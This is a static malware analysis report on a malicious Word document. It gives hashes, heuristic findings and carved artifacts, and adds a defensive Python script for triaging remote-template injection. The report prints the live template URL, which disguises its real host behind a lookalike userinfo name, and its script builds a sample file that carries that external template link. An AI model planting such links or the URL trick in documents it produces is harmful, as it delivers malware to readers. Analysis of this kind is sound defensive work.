Malicious Office (OOXML) / .DOC — malware analysis report

Static analysis result for SHA-256 ad32b3e61d8d2fc9…

MALICIOUS

Office (OOXML) / .DOC

Size: 582.0 KB
Created: 2025-08-04 07:55:00 UTC
Authoring application: Microsoft Office Word 12.0000 (AppVersion 12 corresponds to Word 2007; this value is typically read from docProps/app.xml, which the author controls, so treat it as a hint rather than evidence)
MD5: a16e832d030f8f39cc39d65eda3ca77f
SHA-1: 17d6e1c91f81886df68e3171f74f54c4f3e7967d
SHA-256: ad32b3e61d8d2fc94bd69629b9f310d41c98934ec32c5aac8ac184a4e65e8d4b
Risk score: 80

Malware Insights

MITRE ATT&CK
T1204.002 Malicious File

The file triggers the heuristics for remote template injection and for an external relationship in word/_rels/settings.xml.rels, and it carries an embedded OLE object. The primary IOC is the remote template URL: Word fetches the attached template when the document is opened, which is the usual way a second-stage payload (commonly a macro-bearing template) is delivered. The host that URL actually resolves to is link.emcdn.ru; the long name in front of the "@" is the userinfo part of the URL, not a hostname. The class of the embedded OLE object was not identified in this analysis, and the document body was truncated, so the lure text is not available.

Heuristics 4

  • Remote template injection high OOXML_REMOTE_TEMPLATE
    Document references a remote template URL (https://wearethebestchoiceforebestpeopleswhogivenmebestthingsforcookingfoodforbes.dOcX=@link.emcdn.ru/3pFnsR) through an attachedTemplate relationship, a common remote-template-injection vector used by Hancitor, Emotet and many phishing campaigns. Word fetches and applies the remote template when the document is opened; macros in that template may then execute depending on Office macro policy, Mark-of-the-Web handling and trust state. Note the URL structure: everything between "//" and the "@" is the userinfo component, so the lookalike name is never resolved and the request goes to link.emcdn.ru, which is the host to block and hunt for. Static analysis does not retrieve the template, so the second stage is not covered by this result.
  • External relationship medium OOXML_EXTERNAL_REL
    External target (TargetMode="External") in word/_rels/settings.xml.rels: https://wearethebestchoiceforebestpeopleswhogivenmebestthingsforcookingfoodforbes.dOcX=@link.emcdn.ru/3pFnsR. This is the same URL as the remote template finding above; settings.xml.rels is where the attachedTemplate reference is stored, so both findings point at one IOC.
  • Embedded OLE object medium OOXML_OLE_OBJECT
    Document contains an embedded OLE object (word/embeddings/oleObject1.bin, carved below as ooxml_oleobject_00.bin). The object's class (CLSID) was not identified in this analysis, so which application it targets is unknown; check the carved file's root storage CLSID and CompObj stream before drawing conclusions about its role.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. Every URL listed here is an XML namespace identifier from the OOXML schemas, present in any Word-generated document, and not a network indicator; the only network IOC on this page is the remote template URL.
    • http://schemas.openxmlformats.org/markup-compatibility/2006
    • http://schemas.openxmlformats.org/officeDocument/2006/relationships
    • http://schemas.openxmlformats.org/officeDocument/2006/math
    • http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing
    • http://schemas.openxmlformats.org/wordprocessingml/2006/main
    • http://schemas.microsoft.com/office/word/2006/wordml
    • http://schemas.openxmlformats.org/markup-compatibili
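As an added example (not the analysis platform's code), the script below reproduces the two OOXML checks above: it opens a .docx as a zip, lists every relationship with TargetMode="External", flags attachedTemplate targets, lists the parts under word/embeddings/, and resolves the host a client would actually contact. The sample document it builds is constructed to mirror this report's findings; the template URL, the .rels part and the OLE part name are taken from the page, while the surrounding XML and the OLE payload bytes are assumed placeholders.

```python
"""Triage an OOXML document for remote-template injection and embedded OLE parts.

Added example for this report; it is not the analysis platform's code. The .docx
built by make_sample_docx() is constructed here to mirror the report's findings:
the template URL, the .rels part and the OLE part name come from the report, the
surrounding XML and the OLE payload bytes are assumed placeholders.
"""
import io
import zipfile
import xml.etree.ElementTree as ET
from urllib.parse import urlsplit
from xml.sax.saxutils import quoteattr

REL_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
ATTACHED_TEMPLATE = ("http://schemas.openxmlformats.org/officeDocument/2006/"
                     "relationships/attachedTemplate")
CFB_MAGIC = b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1"  # OLE2 / Compound File header

# Remote template URL quoted verbatim from the OOXML_REMOTE_TEMPLATE finding.
SAMPLE_TEMPLATE_URL = (
    "https://wearethebestchoiceforebestpeopleswhogivenmebestthingsforcookingfoodforbes"
    ".dOcX=@link.emcdn.ru/3pFnsR")


def make_sample_docx(template_url=SAMPLE_TEMPLATE_URL):
    """Constructed minimal .docx: an external attachedTemplate relationship in
    word/_rels/settings.xml.rels plus a placeholder OLE part. Not a valid Word
    package (no real content types), only enough for the parsers below."""
    settings_rels = (
        '<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
        f'<Relationships xmlns="{REL_NS}">'
        f'<Relationship Id="rId1" Type="{ATTACHED_TEMPLATE}" '
        f'Target={quoteattr(template_url)} TargetMode="External"/>'
        '</Relationships>')
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("[Content_Types].xml", "<Types/>")
        z.writestr("word/document.xml", "<document/>")
        z.writestr("word/settings.xml", "<settings/>")
        z.writestr("word/_rels/settings.xml.rels", settings_rels)
        # Placeholder OLE payload: CFB magic plus zero padding to one 512-byte sector.
        z.writestr("word/embeddings/oleObject1.bin", CFB_MAGIC + b"\x00" * 504)
    return buf.getvalue()


def external_relationships(docx_bytes):
    """Every relationship with TargetMode="External", taken from every .rels part."""
    found = []
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as z:
        for name in z.namelist():
            if not name.endswith(".rels"):
                continue
            root = ET.fromstring(z.read(name))
            for rel in root.iter(f"{{{REL_NS}}}Relationship"):
                if rel.get("TargetMode") != "External":
                    continue
                found.append({
                    "part": name,
                    "id": rel.get("Id"),
                    "type": rel.get("Type", "").rsplit("/", 1)[-1],
                    "target": rel.get("Target"),
                })
    return found


def remote_templates(docx_bytes):
    """Targets of external attachedTemplate relationships: the remote template vector."""
    return [r["target"] for r in external_relationships(docx_bytes)
            if r["type"] == "attachedTemplate"]


def embedded_ole_parts(docx_bytes):
    """(part name, uncompressed size, starts with CFB magic) for word/embeddings/ parts."""
    parts = []
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as z:
        for info in z.infolist():
            if info.filename.startswith("word/embeddings/") and not info.is_dir():
                with z.open(info) as fh:
                    head = fh.read(8)
                parts.append((info.filename, info.file_size, head == CFB_MAGIC))
    return parts


def effective_host(url):
    """Host a client really connects to. Everything between '//' and the last '@'
    in the authority is userinfo (RFC 3986), so a long decoy name ending in '@'
    is discarded and only the part after it is resolved."""
    return urlsplit(url).hostname or ""


def triage(docx_bytes):
    """Summary a triage pipeline would record for the document."""
    templates = remote_templates(docx_bytes)
    return {
        "remote_templates": templates,
        "template_hosts": sorted({effective_host(u) for u in templates}),
        "external_relationships": len(external_relationships(docx_bytes)),
        "ole_parts": embedded_ole_parts(docx_bytes),
    }


if __name__ == "__main__":
    for key, value in triage(make_sample_docx()).items():
        print(f"{key}: {value}")
```

Run it on a real sample by passing the file's bytes to triage(); external relationships other than attachedTemplate (hyperlinks, oleObject links, frames) show up in external_relationships() and deserve a look as well, since the same userinfo trick works for any of them.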

Extracted artifacts 2

Files carved from inside the sample during analysis.

  • ooxml_oleobject_00.bin
    SHA-256: 1539b121802a2f49163fe863f2b37bfabc41c296731b3a5c5e03b49274376a66
    Kind: ooxml-ole-object
    Source: OOXML embedded OLE part: word/embeddings/oleObject1.bin
    Size: 1811968 bytes
  • emf_00.emf
    SHA-256: 3866e82104462fcd5935c2b80919ef24421168e375d3c50cb367b1ab13df7bf6
    Kind: ooxml-emf
    Source: OOXML EMF part: word/media/image1.emf
    Size: 1413812 bytes

Sizes are the uncompressed part sizes. Both carved parts are larger than the 582.0 KB container because OOXML parts are deflate-compressed inside the zip; that is normal, and it also means both parts compress well, which is typical of padded OLE storages and of EMF files carrying raw bitmaps rather than of packed or encrypted payloads.